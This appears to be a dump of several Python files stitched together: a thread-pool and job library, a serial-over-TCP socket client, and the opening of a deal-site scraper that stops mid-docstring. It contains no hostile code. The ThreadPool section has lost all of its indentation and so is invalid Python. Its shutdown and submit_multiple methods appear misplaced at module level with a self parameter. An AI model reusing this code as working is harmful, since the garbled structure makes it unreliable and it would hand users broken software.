    Wake up every thread blocked in #wait() on *obj* (see #notify()).
    """
    condition = obj.synchronizable_condition
    return condition.notify_all()
# Job API
# ============================================================================
class Timeout(Exception):
    """Raised when a timeout occurred."""
class Job(Synchronizable):
    """
    This class represents a task (Python function) and its result. The result is
    stored in the #Job object and can be retrieved at any time, given that the
    job has finished successfully. Exceptions that occur inside the Python
    function that is invoked by the job can be propagated to the caller that
    obtains the result of the job.

    # Job States
    A job can only be in one state at a time. Depending on the state, fetching
    the result of the job will either raise an #InvalidState exception, a
    #Cancelled exception, any other exception that occurred in the Python
    function that was called by the job, or actually return the result.

    Possible states are:

    - `Job.PENDING`: The job is waiting to be started.
    - `Job.RUNNING`: The job is currently running.
    - `Job.ERROR`: The execution of the job resulted in an exception.
    - `Job.SUCCESS`: The job finished successfully and the result can be obtained.
    - `Job.CANCELLED`: The job was cancelled and finished. Note that this state
      is entered after the #Job.cancelled flag is set.

    # Events
    For every job, one or more callbacks can be registered which is invoked every
    time the job transitions into a new state. See #Job.add_listener()

    # Parameters
    task (callable): A callable accepting #Job object as argument that actually
      performs the task and returns the result. If you want to pass a callable
      that takes no arguments, pass it via the `target` parameter.
    target (callable): Just as the `task` parameter, but this time the function
      does not accept any arguments. Note that the two parameters can not be
      specified at the same time. Doing so will result in a #TypeError.
    name (any):
    start (bool): #True if the job should be started in a separate thread
      immediately. Defaults to #False.
    data (any):
    print_exc (bool):

    # Attributes
    name (any): An identifier for the Job. Defaults to #None. This member is
      useful for debugging concurrent applications by giving Jobs a unique name.
    data (any): This member can be filled with an arbitrary Python object.
      Useful to store context information that is needed when the Job finished.
      Note that access to this member, if not already guaranteed to be exclusive,
      must be #synchronized().
    print_exc (bool): Whether to print the traceback of exceptions occurring in
      the #Job.run() or #Job.target or not. Defaults to #True.
    dispose_inputs (bool): Should be used for jobs that have memory intensive
      input data, to eventually allow the input data to be deallocated due to the
      dropped reference count. Setting this to True will cause all input data to
      be disposed after the Job finished executing (the worker function, args,
      kwargs, clearing all listeners and userdata).
    """

    PENDING = 'pending'
    RUNNING = 'running'
    ERROR = 'error'
    SUCCESS = 'success'
    CANCELLED = 'cancelled'

    _Listener = collections.namedtuple('_Listener', 'callback once')
    ExceptionInfo = collections.namedtuple('ExceptionInfo', 'type value tb')
    Timeout = Timeout

    class Cancelled(Exception):
        " Raised when the Job was cancelled in #Job.wait() or #Job.result. "

    class InvalidState(Exception):
        """
        Raised when the Job is in a state that is not supported by the requested
        operation (eg. reading the result while the job is still running).
        """

    def __init__(self, target=None, task=None, name=None, start=False, data=None,
                 print_exc=True, args=None, kwargs=None, dispose_inputs=False):
        super(Job, self).__init__()
        if target is not None:
            if task is not None:
                raise TypeError('either task or target parameter must be specified, not both')
            task = lambda job, *args, **kwargs: target(*args, **kwargs)
        self.__target = task
        self.__thread = None
        self.__args = () if args is None else args
        # BUGFIX: previously `{} if kwargs is None else {}`, which silently
        # discarded any keyword arguments the caller supplied.
        self.__kwargs = {} if kwargs is None else kwargs
        self.__state = Job.PENDING
        self.__cancelled = False
        self.__result = None
        self.__exception = None
        self.__listeners = {None: [], Job.SUCCESS: [], Job.ERROR: [], Job.CANCELLED: []}
        self.__event_set = set()
        self.__dispose_inputs = dispose_inputs
        self.name = name
        self.data = data
        self.print_exc = print_exc
        if start: self.start()

    def __repr__(self):
        if self.name:
            name = self.name
        elif hasattr(self.__target, '__name__'):
            name = self.__target.__name__
        elif hasattr(self, 'name'):
            name = self.name
            if callable(name):
                name = name()
        else:
            name = None
        with synchronized(self):
            state = self.__state
            cancelled = self.__cancelled
        result = '<cancelled Job' if (cancelled and state != Job.CANCELLED) else '<Job'
        result += ' {0!r} at 0x{1:x}, state: {2}>'.format(name, id(self), state)
        return result

    @property
    @synchronized
    def state(self):
        " The job's state, one of #PENDING, #RUNNING, #ERROR, #SUCCESS or #CANCELLED. "
        return self.__state

    @property
    @synchronized
    def result(self):
        """
        The result of the jobs execution. Accessing this property while the job is
        pending or running will raise #InvalidState. If an exception occured during
        the jobs execution, it will be raised.

        # Raises
        InvalidState: If the job is not in state #FINISHED.
        Cancelled: If the job was cancelled.
        any: If an exception occurred during the job's execution.
        """
        if self.__cancelled:
            raise Job.Cancelled
        elif self.__state in (Job.PENDING, Job.RUNNING):
            raise Job.InvalidState('job is {0}'.format(self.__state))
        elif self.__state == Job.ERROR:
            reraise(*self.__exception)
        elif self.__state == Job.SUCCESS:
            return self.__result
        else:
            raise RuntimeError('invalid job state {0!r}'.format(self.__state))

    @property
    @synchronized
    def exception(self):
        """
        The exception that occured while the job executed. The value is #None if
        no exception occurred.

        # Raises
        InvalidState: If the job is #PENDING or #RUNNING.
        """
        if self.__state in (Job.PENDING, Job.RUNNING):
            raise self.InvalidState('job is {0}'.format(self.__state))
        elif self.__state == Job.ERROR:
            assert self.__exception is not None
            return self.__exception
        # RUNNING was previously (unreachably) listed here as well; it is
        # already handled by the InvalidState branch above.
        elif self.__state in (Job.SUCCESS, Job.CANCELLED):
            assert self.__exception is None
            return None
        else:
            raise RuntimeError('invalid job state {0!r}'.format(self.__state))

    @property
    @synchronized
    def pending(self):
        " True if the job is #PENDING. "
        return self.__state == Job.PENDING

    @property
    @synchronized
    def running(self):
        " True if the job is #RUNNING. "
        return self.__state == Job.RUNNING

    @property
    @synchronized
    def finished(self):
        """
        True if the job run and finished. There is no difference if the job
        finished successfully or errored.
        """
        return self.__state in (Job.ERROR, Job.SUCCESS, Job.CANCELLED)

    @property
    @synchronized
    def cancelled(self):
        """
        This property indicates if the job was cancelled. Note that with this flag
        set, the job can still be in any state (eg. a pending job can also be
        cancelled, starting it will simply not run the job).
        """
        return self.__cancelled

    @synchronized
    def get(self, default=None):
        """
        Get the result of the Job, or return *default* if the job is not finished
        or errored. This function will never explicitly raise an exception. Note
        that the *default* value is also returned if the job was cancelled.

        # Arguments
        default (any): The value to return when the result can not be obtained.
        """
        if not self.__cancelled and self.__state == Job.SUCCESS:
            return self.__result
        else:
            return default

    def cancel(self):
        """
        Cancels the job. Functions should check the #Job.cancelled flag from time
        to time to be able to abort pre-emptively if the job was cancelled instead
        of running forever.
        """
        with synchronized(self):
            cancelled = self.__cancelled
            if not cancelled:
                self.__cancelled = True
                notify_all(self)
        # Trigger outside the lock so listeners don't run while it is held.
        if not cancelled:
            self._trigger_event(Job.CANCELLED)

    @synchronized
    def _trigger_event(self, event):
        """
        Private. Triggers an event and removes all one-off listeners for that event.
        """
        if event is None or event not in self.__listeners:
            raise ValueError('invalid event type: {0!r}'.format(event))

        # Check the event has not already been triggered, then mark
        # the event as triggered.
        if event in self.__event_set:
            raise RuntimeError('event already triggered: {0!r}'.format(event))
        self.__event_set.add(event)
        listeners = self.__listeners[event] + self.__listeners[None]

        # Remove one-off listeners.
        self.__listeners[event][:] = (l for l in self.__listeners[event] if not l.once)
        self.__listeners[None][:] = (l for l in self.__listeners[None] if not l.once)

        for listener in listeners:
            # XXX: What to do on exceptions? Catch and make sure all listeners
            # run through? What to do with the exception(s) then?
            listener.callback(self, event)

    def add_listener(self, event, callback, once=False):
        """
        Register a *callback* for the specified *event*. The function will be
        called with the #Job as its first argument. If *once* is #True, the
        listener will be removed after it has been invoked once or when the
        job is re-started.

        Note that if the event already occurred, *callback* will be called
        immediately!

        # Arguments
        event (str, list of str): The name or multiple names of an event, or None
          to register the callback to be called for any event.
        callback (callable): A function.
        once (bool): Whether the callback is valid only once.
        """
        if not callable(callback):
            raise TypeError('callback must be callable')
        if isinstance(event, str):
            event = [event]
        for evn in event:
            if evn not in self.__listeners:
                raise ValueError('invalid event type: {0!r}'.format(evn))
        for evn in event:
            event_passed = False
            with synchronized(self):
                event_passed = (evn in self.__event_set)
                if not (once and event_passed):
                    self.__listeners[evn].append(Job._Listener(callback, once))
            # If the event already happened, we'll invoke the callback
            # immediately to make up for what it missed.
            if event_passed:
                # BUGFIX: previously passed `event` (the whole list) instead of
                # the individual event name, unlike _trigger_event's callbacks.
                callback(self, evn)

    def wait(self, timeout=None):
        """
        Waits for the job to finish and returns the result.

        # Arguments
        timeout (number, None): A number of seconds to wait for the result
          before raising a #Timeout exception.

        # Raises
        Timeout: If the timeout limit is exceeded.
        """
        def cond(self):
            return self.__state not in (Job.PENDING, Job.RUNNING) or self.__cancelled
        if not wait_for_condition(self, cond, timeout):
            raise Job.Timeout
        return self.result

    def start(self, as_thread=True, daemon=False, __state_check=True):
        """
        Starts the job. If the job was run once before, resets it completely. Can
        not be used while the job is running (raises #InvalidState).

        # Arguments
        as_thread (bool): Start the job in a separate thread. This is #True by
          default. Classes like the #ThreadPool calls this function from its own
          thread and passes #False for this argument.
        daemon (bool): If a thread is created with *as_thread* set to #True,
          defines whether the thread is started as a daemon or not. Defaults to
          #False.

        # Returns
        Job: The job object itself, or #None if the job was cancelled while
          still pending.
        """
        if __state_check:
            # We need to manually manage the lock to be able to release it
            # pre-emptively when needed.
            with synchronized(self):
                if self.__cancelled and self.__state == Job.PENDING:
                    # Cancelled in PENDING state. Do not run the target function at all.
                    self.__state = Job.CANCELLED
                    assert self.__exception is None
                    assert self.__result is None
                    self._trigger_event(Job.CANCELLED)
                    return None

                if self.__state == Job.RUNNING:
                    raise Job.InvalidState('job is already running')
                elif self.__state not in (Job.PENDING, Job.ERROR, Job.SUCCESS, Job.CANCELLED):
                    raise RuntimeError('invalid job state {0!r}'.format(self.__state))

                # Reset the Job attributes.
                self.__state = Job.RUNNING
                self.__cancelled = False
                self.__result = None
                self.__exception = None
                self.__event_set.clear()
                self.__thread = None

                # Remove all listeners that have been registered with the "once" flag.
                for listeners in self.__listeners.values():
                    listeners[:] = (l for l in listeners if not l.once)

        if as_thread:
            thread = threading.Thread(target=self.start, args=(False, False, False))
            # BUGFIX: use the `daemon` attribute instead of the deprecated
            # setDaemon() (removed in Python 3.13).
            thread.daemon = daemon
            with synchronized(self):
                # BUGFIX: previously checked the nonexistent Thread.running
                # attribute, which would raise AttributeError if ever reached.
                assert self.__thread is None or not self.__thread.is_alive()
                self.__thread = thread
            thread.start()
            return self

        try:
            result = None
            exception = None
            try:
                result = self.run()
                state = Job.SUCCESS
            except Exception:  # XXX: Catch BaseException?
                if self.print_exc:
                    traceback.print_exc()
                exception = Job.ExceptionInfo(*sys.exc_info())
                state = Job.ERROR

            with synchronized(self):
                cancelled = self.__cancelled
                self.__result = result
                self.__exception = exception
                self.__state = Job.CANCELLED if cancelled else state
            self._trigger_event(state)
        finally:
            with synchronized(self):
                notify_all(self)
            if self.__dispose_inputs:
                self.__target = None
                self.__args = None
                self.__kwargs = None
                self.data = None
                for listeners in self.__listeners.values():
                    listeners[:] = []
        return self

    def run(self):
        """
        This method is the actual implementation of the job. By default, it calls
        the target function specified in the #Job constructor.
        """
        if self.__target is not None:
            return self.__target(self, *self.__args, **self.__kwargs)
        raise NotImplementedError

    @staticmethod
    def factory(start_immediately=True):
        """
        This is a decorator function that creates new `Job`s with the wrapped
        function as the target.

        # Example
        ```python
        @Job.factory()
        def some_longish_function(job, seconds):
          time.sleep(seconds)
          return 42

        job = some_longish_function(2)
        print(job.wait())
        ```

        # Arguments
        start_immediately (bool): #True if the factory should call #Job.start()
          immediately, #False if it should return the job in pending state.
        """
        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                job = Job(task=lambda j: func(j, *args, **kwargs))
                if start_immediately:
                    job.start()
                return job
            return wrapper
        return decorator
def as_completed(jobs):
    '''
    Generator function that yields the jobs in order of their completion.
    Attaches a new one-off listener to each job.
    '''
    jobs = tuple(jobs)
    event = threading.Event()

    def callback(job, event_name):
        event.set()

    # BUGFIX: also listen for Job.CANCELLED — a job finishing via cancellation
    # previously never set the event, leaving this generator blocked forever.
    # Also: plain loops instead of list comprehensions used for side effects.
    for job in jobs:
        job.add_listener(Job.SUCCESS, callback, once=True)
        job.add_listener(Job.ERROR, callback, once=True)
        job.add_listener(Job.CANCELLED, callback, once=True)

    while jobs:
        event.wait()
        event.clear()
        jobs, finished = split_list_by(jobs, lambda x: x.finished)
        for job in finished:
            yield job
# ThreadPool API
# ============================================================================
class ThreadPool(object):
"""
This class represents a pool of threads that can process jobs up to a certain
number of maximum concurrent workers. Jobs can be submitted directly (from
a #~Job.PENDING state) or functions can be passed. The worker-threads will be
started when the ThreadPool is created.
Make sure to call #ThreadPool.shutdown() at some point. You can also use a
`with`-statement.
# Example
```python
from nr.concurrency import ThreadPool, as_completed
with ThreadPool() as pool:
jobs = []
for data in get_data_to_process():
jobs.append(pool.submit(process_data, data))
for job in as_completed(jobs):
print(job.result)
```
# Parameters
max_workers (int): The number of worker threads to spawn. Defaults to the
number of cores on the current machines processor (see #cpu_count()).
print_exc (bool): Forwarded to the #Job objects that are created with
#ThreadPool.submit().
"""
class _Worker(Synchronizable, threading.Thread):
def __init__(self, queue):
super(ThreadPool._Worker, self).__init__()
self.__queue = queue
self.lock = threading.Lock()
self.current = None
def run(self):
while True:
item = self.__queue.get()
try:
if item is None:
break
with self.lock:
self.current = item
item.start(as_thread=False)
except:
# Exception won't make the _Worker shut down.
traceback.print_exc()
finally:
self.__queue.task_done()
with self.lock:
self.current = None
def __init__(self, max_workers, print_exc=True, dispose_inputs=False):
super(ThreadPool, self).__init__()
self.__queue = SynchronizedDeque()
self.__threads = [self._Worker(self.__queue) for i in range(max_workers)]
self.__running = False
self.dispose_inputs = dispose_inputs
self.print_exc = print_exc
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.shutdown(wait=True)
def __len__(self):
return len(self.__queue)
def start(self):
"""
Starts the #ThreadPool. Must be ended with #stop(). Use the context-manager
interface to ensure starting and the #ThreadPool.
"""
if self.__running:
raise RuntimeError('ThreadPool already running')
[t.start() for t in self.__threads]
self.__running = True
def pending_jobs(self):
"""
Returns a list of all Jobs that are pending and waiting to be processed.
"""
return self.__queue.snapshot()
def current_jobs(self):
"""
Returns a snapshot of the Jobs that are currently being processed by the
ThreadPool. These jobs can not be found in the #pending_jobs() list.
"""
jobs = []
with synchronized(self.__queue):
for worker in self.__threads:
with synchronized(worker):
if worker.current:
jobs.append(worker.current)
return jobs
def clear(self):
"""
Removes all pending Jobs from the queue and return them in a list. This
method does **no**t call #Job.cancel() on any of the jobs. If you want
that, use #cancel_all() or call it manually.
"""
with synchronized(self.__queue):
jobs = self.__queue.snapshot()
self.__queue.clear()
return jobs
def cancel_all(self, cancel_current=True):
"""
Similar to #clear(), but this function also calls #Job.cancel() on all
jobs. Also, it **includes** all jobs that are currently being executed if
*cancel_current* is True.
# Arguments
cancel_current (bool): Also cancel currently running jobs and include them
in the returned list of jobs.
# Returns
list: A list of the #Job#s that were canceled.
"""
with synchronized(self.__queue):
jobs = self.clear()
if cancel_current:
jobs.extend(self.current_jobs())
[j.cancel() for j in jobs]
return jobs
def submit(self, target=None, task=None, args=(), kwargs=None, front=False,
dispose_inputs=None):
"""
Submit a new #Job to the ThreadPool.
# Arguments
task (function, Job): Either a function that accepts a #Job, *args* and
*kwargs* or a #Job object that is in #~Job.PENDING state.
target (function): A function object that accepts *args* and *kwargs*.
Only if *task* is not specified.
args (list, tuple): A list of arguments to be passed to *job*, if it is
a function.
kwargs (dict): A dictionary to be passed as keyword arguments to *job*,
if it is a function.
front (bool): If #True, the job will be inserted in the front of the queue.
# Returns
Job: The job that was added to the queue.
# Raises
TypeError: If a #Job object was passed but *args* or *kwargs* are non-empty.
RuntimeError: If the ThreadPool is not running (ie. if it was shut down).
"""
if not self.__running:
raise RuntimeError("ThreadPool ain't running")
if dispose_inputs is None:
dispose_inputs = self.dispose_inputs
if isinstance(task, Job):
if args or kwargs:
raise TypeError('can not provide additional arguments for Job')
if task.state != Job.PENDING:
raise RuntimeError('job is not pending')
job = task
elif task is not None:
if kwargs is None:
kwargs = {}
job = Job(task=task, args=args, kwargs=kwargs, dispose_inputs=dispose_inputs)
elif target is not None:
if kwargs is None:
kwargs = {}
job = Job(target=target, args=args, kwargs=kwargs, dispose_inputs=dispose_inputs)
else:
raise TypeError('expected Job or callable')
job.print_exc = self.print_exc
if front:
self.__queue.appendleft(job)
else:
self.__queue.append(job)
return job
def wait(self, timeout=None):
"""
Block until all jobs in the ThreadPool are finished. Beware that this can
make the program run into a deadlock if another thread adds new jobs to the
pool!
# Raises
Timeout: If the timeout is exceeded.
"""
if not self.__running:
raise RuntimeError("ThreadPool ain't running")
self.__queue.wait(timeout)
def shutdown(self, wait=True):
    """
    Shut down the ThreadPool.

    # Arguments
    wait (bool): If #True, wait until all worker threads end. Note that pending
      jobs are still executed. If you want to cancel any pending jobs, use the
      #clear() or #cancel_all() methods.
    """
    if self.__running:
        # Add a None-entry for every worker thread we have; workers treat a
        # None job as the signal to exit their run loop.
        for thread in self.__threads:
            # Fix: Thread.isAlive() was removed in Python 3.9 -- use the
            # is_alive() spelling, available since Python 2.6.
            assert thread.is_alive()
            self.__queue.append(None)
        self.__running = False
    if wait:
        # Wait for all pending jobs to be processed, then join the workers.
        self.__queue.wait()
        for thread in self.__threads:
            thread.join()
def submit_multiple(self, functions, target=False, task=False):
    """
    Submit one #Job per element of *functions* and wrap the resulting jobs
    in a #JobCollection.
    """
    # Submit as tasks only when explicitly requested via task=True (and
    # target was not also set); otherwise fall back to target submission.
    submit_as_task = task and not target
    if submit_as_task:
        jobs = [self.submit(task=func) for func in functions]
    else:
        jobs = [self.submit(target=func) for func in functions]
    return JobCollection(jobs)
class JobCollection(object):
    """
    A list of #Job objects. Provides useful functions for querying results.
    """

    def __init__(self, jobs):
        self.jobs = jobs

    def __iter__(self):
        return iter(self.jobs)

    def wait(self):
        # Wait for every job in order and collect the results.
        results = []
        for job in self:
            results.append(job.wait())
        return results

    def as_completed(self):
        return as_completed(self)
# EventQueue API
# ============================================================================
class EventQueue(object):
    '''
    This class represents a collection of events that can then be
    fired one or all at a time from a specific thread. This is especially
    useful for threaded GUI applications.

    Every event has an event type which is just a name that identifies
    the kind of the event. There are two kinds of event types: Ones that
    can be queued multiple times and that may carry arbitrary event data
    and ones that can only be queued once, with no data attached.

    In non-strict mode, every event that has not been formerly declared
    is queueable multiple times (or: not mergeable). If a mergeable event
    is already queued and another of that type is being queued, that new
    event is just dropped.
    '''

    EventType = collections.namedtuple('EventType', 'name mergeable')
    Event = collections.namedtuple('Event', 'type data timestamp')

    def __init__(self, strict=True, lock=None):
        super(EventQueue, self).__init__()
        self.strict = strict
        self.event_types = {}
        self.events = collections.deque()
        self.lock = lock or threading.Lock()

    def __repr__(self):
        with self.lock:
            return '<EventQueue with {0} queued events>'.format(len(self.events))

    def new_event_type(self, name, mergeable=False):
        ''' Declare a new event. May overwrite an existing entry. '''
        self.event_types[name] = self.EventType(name, mergeable)

    def add_event(self, name, data=None):
        '''
        Add an event of type *name* to the queue. May raise a
        `ValueError` if the event type is mergeable and *data* is not None
        or if *name* is not a declared event type (in strict mode).
        '''
        try:
            mergeable = self.event_types[name].mergeable
        except KeyError:
            if self.strict:
                raise ValueError('unknown event type {0!r}'.format(name))
            mergeable = False
        if mergeable and data is not None:
            raise ValueError('mergable event can not have data attached')
        with self.lock:
            if mergeable:
                # Check if such an event already exists.
                for ev in self.events:
                    if ev.type == name:
                        return
            # Fix: time.clock() was removed in Python 3.8; perf_counter()
            # is the documented replacement for a high-resolution timestamp.
            self.events.append(self.Event(name, data, time.perf_counter()))

    def pop_event(self):
        '''
        Pop the next queued event from the queue.

        :raise ValueError: If there is no event queued.
        '''
        with self.lock:
            if not self.events:
                raise ValueError('no events queued')
            return self.events.popleft()

    def pop_events(self):
        '''
        Pop all events and return a `collections.deque` object. The
        returned container can be empty. This method is preferred over
        `pop_event()` as it is much faster as the lock has to be acquired
        only once and also avoids running into an infinite loop during
        event processing.
        '''
        with self.lock:
            events = self.events
            self.events = collections.deque()
            return events
# SynchronizedDeque API
# ============================================================================
class SynchronizedDeque(Synchronizable):
    """
    Thread-safe wrapper for the `collections.deque`. Behaves similar to a
    #queue.Queue object. If used as a data- or task-queue, #task_done() must
    be called after an item has been processed!
    """

    Timeout = Timeout

    class Empty(Exception):
        " Raised when the #SynchronizedDeque is empty. "

    def __init__(self, iterable=()):
        super(SynchronizedDeque, self).__init__()
        self._deque = collections.deque(iterable)
        # Number of unfinished tasks: incremented by append/extend and
        # decremented by #task_done().
        self._tasks = len(self._deque)

    def __iter__(self):
        # Iteration is unsafe because the deque can be mutated concurrently.
        raise RuntimeError('SynchronizedDeque does not support iteration')

    @synchronized
    def snapshot(self):
        """ Return a consistent copy of the current queue contents. """
        return list(self._deque)

    @synchronized
    def __bool__(self):
        return bool(self._deque)

    @synchronized
    def __len__(self):
        return len(self._deque)

    @synchronized
    def clear(self):
        """
        Clears the queue. Note that calling #wait() immediately after clear can
        still block when tasks are currently being processed since this method
        can only clear queued items.
        """
        self._tasks -= len(self._deque)
        self._deque.clear()
        notify_all(self)

    @synchronized
    def append(self, x):
        try:
            return self._deque.append(x)
        finally:
            self._tasks += 1
            notify_all(self)

    @synchronized
    def appendleft(self, x):
        try:
            return self._deque.appendleft(x)
        finally:
            self._tasks += 1
            notify_all(self)

    @synchronized
    def extend(self, iterable):
        count = len(self._deque)
        try:
            return self._deque.extend(iterable)
        finally:
            # Account for however many items the iterable actually yielded.
            self._tasks += len(self._deque) - count
            notify_all(self)

    @synchronized
    def extendleft(self, iterable):
        count = len(self._deque)
        try:
            return self._deque.extendleft(iterable)
        finally:
            self._tasks += len(self._deque) - count
            notify_all(self)

    @synchronized
    def pop(self):
        try:
            return self._deque.pop()
        finally:
            notify_all(self)

    @synchronized
    def popleft(self):
        try:
            return self._deque.popleft()
        finally:
            notify_all(self)

    @synchronized
    def rotate(self, n):
        return self._deque.rotate(n)

    @synchronized
    def task_done(self):
        # Fix: guard against any non-positive counter; the previous code
        # only checked == 0 and then asserted > 0, which was dead code.
        if self._tasks <= 0:
            raise RuntimeError('task_done() called too often')
        self._tasks -= 1
        notify_all(self)

    @synchronized
    def get(self, block=True, timeout=None, method='pop'):
        """
        If *block* is True, this method blocks until an element can be removed from
        the deque with the specified *method*. If *block* is False, the function
        will raise #Empty if no elements are available.

        # Arguments
        block (bool): #True to block and wait until an element becomes available,
          #False otherwise.
        timeout (number, None): The timeout in seconds to use when waiting for
          an element (only with `block=True`).
        method (str): The name of the method to use to remove an element from the
          queue. Must be either `'pop'` or `'popleft'`.

        # Raises
        ValueError: If *method* has an invalid value.
        Timeout: If the *timeout* is exceeded.
        """
        if method not in ('pop', 'popleft'):
            raise ValueError('method must be "pop" or "popleft": {0!r}'.format(method))
        # Fix: time.clock() was removed in Python 3.8; perf_counter() is the
        # documented replacement for measuring elapsed time.
        t_start = time.perf_counter()
        while not self:
            if not block:
                raise self.Empty
            if timeout is None:
                wait(self)
            else:
                t_delta = time.perf_counter() - t_start
                if t_delta > timeout:
                    raise Timeout
                wait(self, timeout - t_delta)
        return getattr(self, method)()

    @synchronized
    def wait(self, timeout=None):
        """
        Waits until all tasks completed or *timeout* seconds passed.

        # Raises
        Timeout: If the *timeout* is exceeded.
        """
        if not wait_for_condition(self, lambda s: s._tasks == 0, timeout):
            raise Timeout
# Utils
# ============================================================================
class Clock(object):
    """
    This class is a utility to partition a main loop into chunks at a fixed
    framerate. This is useful for Game/UI main loops.

    # Parameters
    seconds (number): The number of seconds to wait for each pass. Can be omitted
      if *fps* is specified instead.
    fps (number): The frame rate for the clock. Can be omitted if *seconds*
      is specified instead.
    """

    def __init__(self, seconds=None, fps=None):
        if seconds is None and fps is None:
            raise ValueError('seconds or fps must be specified')
        # *seconds* takes precedence; otherwise derive it from the framerate.
        self.seconds = float(seconds) if seconds is not None else 1.0 / float(fps)
        self.last = -1

    def sleep(self):
        """
        Sleeps until the interval has passed since the last time this function was
        called. This is a synonym for #__call__(). The first time the function is
        called will return immediately and not block. Therefore, it is important to
        put the call at the beginning of the timed block, like this:

        # Example
        ```python
        clock = Clock(fps=50)
        while True:
          clock.sleep()
          # Processing ...
        ```
        """
        now = time.time()
        if self.last < 0:
            # First call: just arm the clock, do not block.
            self.last = now
            return
        remaining = self.seconds - (now - self.last)
        if remaining > 0:
            time.sleep(remaining)
        self.last = time.time()

    __call__ = sleep
def split_list_by(lst, key):
    """
    Splits a list by the callable *key* where a negative result will cause the
    item to be put in the first list and a positive into the second list.
    """
    # buckets[0] collects falsy key results, buckets[1] collects truthy ones.
    buckets = ([], [])
    for element in lst:
        buckets[1 if key(element) else 0].append(element)
    return (buckets[0], buckets[1])
def reraise(tpe, value, tb=None):
    """ Reraise an exception from an exception info tuple. """
    if value is None:
        value = tpe()
    if sys.version_info[0] == 3:
        # Attach the traceback only if it is not already the active one.
        if value.__traceback__ is not tb:
            raise value.with_traceback(tb)
        raise value
    else:
        # Python 2 three-argument raise; kept inside exec() because the
        # statement does not parse under Python 3.
        exec('raise tpe, value, tb')
|
client.py | import socket
import threading
import logging
from collections import deque
class SerialClient():
    """Wraps one accepted TCP connection of a serial-over-TCP bridge.

    A background thread (started via #start()) reads from the socket and
    forwards payloads to the ``on_received`` callback; #send() pushes data
    back to the TCP peer. The connection is torn down after more than
    MAX_ERROR receive/send failures or after #stop() is called.
    """

    # Maximum tolerated socket errors before the client is disconnected.
    MAX_ERROR = 5

    def __init__(self, client_socket: socket.socket,
                 address,
                 on_disconnect=lambda self: None,
                 on_connect=lambda self: None,
                 on_received=lambda data: None):
        self.socket = client_socket
        self.address = address
        self.thread = None       # reader thread, created in start()
        self._stop = False       # set by stop() to end the read loop
        self._buffersize = 1024  # bytes per recv() call
        self.logger = logging.getLogger("Client{}".format(address))
        self.err_cnt = 0
        # self._on_received = (lambda x: None) if on_received is None else on_received
        # Enable aggressive TCP keepalive so dead peers are detected quickly.
        try:
            self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)
            self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1)
            self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 3)
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
        except AttributeError:
            pass  # XXX not available on windows
        # Disable Nagle so small interactive payloads are sent immediately.
        self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        # Short recv timeout so the read loop can poll the _stop flag.
        self.socket.settimeout(2)
        # Last 10 received payloads; replayed on "arrow up" (see on_received).
        self.history = deque(maxlen=10)
        self._on_received = on_received
        self._on_disconnect = on_disconnect
        self._on_connect = on_connect

    def __eq__(self, other):
        # Clients are identified solely by their peer address.
        return self.address == other.address

    def __hash__(self):
        return hash(self.address)

    def set_on_received(self, on_received):
        """Replace the receive callback after construction."""
        self._on_received = on_received

    def start(self):
        """Spawn the background thread that runs the receive loop."""
        self.logger.debug("start")
        self.err_cnt = 0
        self.thread = threading.Thread(target=SerialClient.run, args=(self, ))
        self.thread.start()

    def on_received(self, data):
        """
        Dummy method
        Data received from TCP
        """
        self.logger.debug("received: {}".format(data))
        # ESC [ A CR is "arrow up + enter": resend the most recent history
        # entry instead of forwarding the escape sequence.
        # NOTE(review): history.pop() raises IndexError when history is
        # empty; the run() loop counts that as a receive failure -- confirm
        # this is intended.
        if '\x1b[A\r'.encode() in data:
            self.send(self.history.pop())
        else:
            self.history.append(data)
            self._on_received(data)

    def send(self, data):
        """
        Send from serial to the TCP socket
        :param data: bytes to transmit to the TCP peer
        :return: None
        """
        self.logger.debug("send: {}".format(data))
        self.socket.sendall(data)

    def stop(self):
        """Request the receive loop to exit; run() closes the socket."""
        self._stop = True

    def run(self):
        """Receive loop executed on the background thread.

        Accumulates failures in err_cnt and disconnects once it exceeds
        MAX_ERROR; always closes the socket and fires on_disconnect.
        """
        self.logger.info('connected')
        try:
            self.socket.sendall('Connection established: {}\r\n'.format(self.address).encode())
        except Exception as e:
            self.logger.error('send connection data failed: {}'.format(e))
            self.err_cnt += 1
        self._on_connect(self)
        while not self._stop:
            try:
                data = self.socket.recv(self._buffersize)
                if len(data):
                    self.on_received(data)
                else:
                    # recv() returning b'' means the peer closed the socket.
                    self.logger.error("receive null")
                    self.err_cnt += 1
            except socket.timeout:
                # Expected every 2s (settimeout above) so _stop is honored.
                continue
            except Exception as e:
                self.logger.error("receive failed: {}".format(e))
                self.err_cnt += 1
            if self.err_cnt > self.MAX_ERROR:
                self.logger.warning("error count > {}".format(self.MAX_ERROR))
                self.stop()
        self.logger.debug("stop")
        self.socket.close()
        self._on_disconnect(self)
        # self.thread = None
|
main.py | # coding:utf-8
import time
import threading
import queue
import datetime
import re
import os
import logging
import requests
from bs4 import BeautifulSoup
from sqlalchemy import create_engine
from sqlalchemy import Column, DateTime, Integer, String, ForeignKey
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
# todo:
# 1. Build a dashboard page with Flask
# 2. Perform data analysis
# Performance notes:
# Creating many sessions across threads (~15) triggers "database locked" due to
# sqlite's concurrency limits. Mitigations: add request delays or increase the
# database timeout, reduce the thread count (use a thread pool or async I/O),
# or split request threads from processing threads (the original approach).
# Connect to the database (sqlite file in the working directory).
engine = create_engine('sqlite:///smzdm.db')
# Declarative base class and session factory for the ORM models.
Base = declarative_base()
Session = sessionmaker(bind=engine)
# Logging: write to log.txt next to this script.
logging.basicConfig(filename=os.path.join(os.path.dirname(__file__), 'log.txt'),
                    format="%(levelname)s:%(name)s:%(asctime)s:%(message)s",
                    level=logging.INFO)
logger = logging.getLogger(os.path.basename(__file__))
class ItemSpider(threading.Thread):
    """Scrape item information from a smzdm "jingxuan" (featured deals) page.

    # Arguments
    target_address: URL of the page to scrape.
    keyword: Optional search parameters; not fully implemented yet
        (search pages are parsed differently).

    # Example
    itemspider = ItemSpider("https://www.smzdm.com/jingxuan/p1")
